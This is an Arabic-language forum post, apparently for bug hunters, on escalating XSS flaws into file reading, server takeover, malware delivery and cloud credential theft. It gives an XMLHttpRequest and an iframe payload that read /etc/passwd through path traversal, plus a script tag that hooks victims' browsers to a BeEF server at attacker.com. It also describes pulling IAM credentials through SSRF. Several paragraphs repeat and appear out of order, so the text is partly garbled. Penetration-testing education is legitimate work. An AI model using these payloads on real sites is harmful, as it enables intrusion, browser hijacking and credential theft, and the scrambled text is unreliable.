- بواسطة x32x01 ||
💣🔥 أغلب الناس لما تسمع XSS أول حاجة تيجي في دماغها هي سرقة الكوكيز 🍪
وده تفكير صحيح… بس مش كامل.
خلّيني أخرجك شوية برّه الصندوق 👀
ونشوف إزاي ممكن نرفع خطورة ثغرة XSS ونحوّلها من ثغرة “عادية” لكارثة أمنية حقيقية 🚨
وده اسمه XSS to LFI.
🔴 لو الكود اشتغل، انت كده بتقرأ ملفات حساسة زي:
وتكون فعّالة خصوصًا في المواقع القديمة أو اللي مفيهاش قيود صارمة.
✔️ لو الملف اتعرض جوه الصفحة
يبقى انت كده كسرت حدود الـ frontend ووصلت للسيرفر نفسه.
لو الموقع شغال على CMS أو فيه مكتبات ضعيفة، تقدر توصل لـ RCE.
يعني إيه؟
يعني:
https://pentest.co.uk/labs/leveraging-xss-to-get-rce-in-textpattern/
تقدر من خلالها:
XSS ممكن يفتحلك باب خطير جدًا وهو SSRF.
تقدر:
https://namratha-gm.medium.com/chaining-bugs-escalating-xss-to-ssrf-5cd3d986a97c
لكن المحترف 👨💻:
وده تفكير صحيح… بس مش كامل.
خلّيني أخرجك شوية برّه الصندوق 👀
ونشوف إزاي ممكن نرفع خطورة ثغرة XSS ونحوّلها من ثغرة “عادية” لكارثة أمنية حقيقية 🚨
⚠️ ملحوظة مهمة:
مش كل السيناريوهات دي تنفع على كل المواقع،
كل موقع وليه البنية والـ backend والـ configs بتاعته.
تحويل XSS إلى LFI باستخدام XMLHttpRequest 📂
في بعض الحالات، لو السيرفر مش مأمّن كويس، تقدر تستغل XSS علشان تقرأ ملفات من السيرفر نفسه 😱وده اسمه XSS to LFI.
مثال كود توضيحي 👇
JavaScript:
var xhr = new XMLHttpRequest();
xhr.open("GET", "/../../../../etc/passwd", true);
xhr.onload = function () {
alert(xhr.responseText);
};
xhr.send(); 🔴 لو الكود اشتغل، انت كده بتقرأ ملفات حساسة زي:
- config files
- source code
- credentials
XSS إلى LFI باستخدام iFrame 🖼️
طريقة تانية مشهورة هي استخدام iFrameوتكون فعّالة خصوصًا في المواقع القديمة أو اللي مفيهاش قيود صارمة.
مثال عملي 👇
HTML:
<iframe src="/../../../../etc/passwd"></iframe> يبقى انت كده كسرت حدود الـ frontend ووصلت للسيرفر نفسه.
تحويل XSS إلى RCE (تنفيذ أوامر على السيرفر) 💀
دي بقى مرحلة متقدمة جدًا 🔥لو الموقع شغال على CMS أو فيه مكتبات ضعيفة، تقدر توصل لـ RCE.
يعني إيه؟
يعني:
- تنفيذ أوامر
- رفع ملفات
- تحكم كامل في السيرفر 😈
https://pentest.co.uk/labs/leveraging-xss-to-get-rce-in-textpattern/
استغلال XSS لتثبيت Malware باستخدام BeEF 🐮☠️
أداة BeEF من أخطر الأدوات اللي بتستغل XSS.تقدر من خلالها:
- تتحكم في المتصفح
- تشغّل JavaScript على جهاز الضحية
- تنزّل ملفات خبيثة 💣
مثال بسيط لربط BeEF 👇
HTML:
<script src="http://attacker.com:3000/hook.js"></script>
تحويل XSS إلى SSRF في بيئة AWS ☁️
في بيئات Cloud وخصوصًا AWSXSS ممكن يفتحلك باب خطير جدًا وهو SSRF.
تقدر:
- توصل لـ internal metadata
- تسحب IAM credentials
- تتحكم في خدمات داخلية 😨
https://namratha-gm.medium.com/chaining-bugs-escalating-xss-to-ssrf-5cd3d986a97c
الخلاصة: متقفش عند Proof of Concept بس ❌
كتير من الناس بتكتفي إنها تثبت إن في XSS وخلاص.لكن المحترف 👨💻:
- يدور على chaining
- يربط الثغرات ببعض
- يرفع severity
- يطلع impact حقيقي 🎯
التعديل الأخير: